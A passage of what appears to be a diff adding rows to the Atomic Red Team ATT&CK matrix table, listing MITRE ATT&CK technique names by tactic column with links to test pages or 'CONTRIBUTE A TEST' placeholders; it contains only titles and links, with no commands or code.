+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Exec Into Container](../../T1609/T1609.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Local System](../../T1005/T1005.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Archive Collected Data](../../T1560/T1560.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | [Software Deployment Tools](../../T1072/T1072.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
+| | [Inter-Process Communication](../../T1559/T1559.md) | Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [File and Directory Discovery](../../T1083/T1083.md) | | [Video Capture](../../T1125/T1125.md) | | [Non-Standard Port](../../T1571/T1571.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | [Data Destruction](../../T1485/T1485.md) |
+| | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Escape to Host](../../T1611/T1611.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [Log Enumeration](../../T1654/T1654.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | [Email Collection: Remote Email Collection](../../T1114.002/T1114.002.md) | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+| | Cloud Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | Customer Relationship Management Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Password Policy Discovery](../../T1201/T1201.md) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
+| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
+| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Query Registry](../../T1012/T1012.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
+| | | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Application Access Token](../../T1528/T1528.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | [Cloud Service Discovery](../../T1526/T1526.md) | | Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
+| | | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
+| | | [Server Software Component: Web Shell](../../T1505.003/T1505.003.md) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | | |
+| | | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | |
+| | | [Time Providers](../../T1547.003/T1547.003.md) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Debugger Evasion](../../T1622/T1622.md) | | | | | |
+| | | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | | |
+| | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indirect Command Execution](../../T1202/T1202.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | | | | | | |
+| | | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses](../../T1562/T1562.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | [Forced Authentication](../../T1187/T1187.md) | | | | | | |
+| | | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Process Injection](../../T1055/T1055.md) | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | | | | | | |
+| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | | |
+| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | | |
+| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
+| | | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) | | | | | | |
+| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) | | | | | | |
+| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Account Manipulation](../../T1098/T1098.md) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
+| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Kubernetes List Secrets](../../T1552.007/T1552.007.md) | | | | | | |
+| | | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
+| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
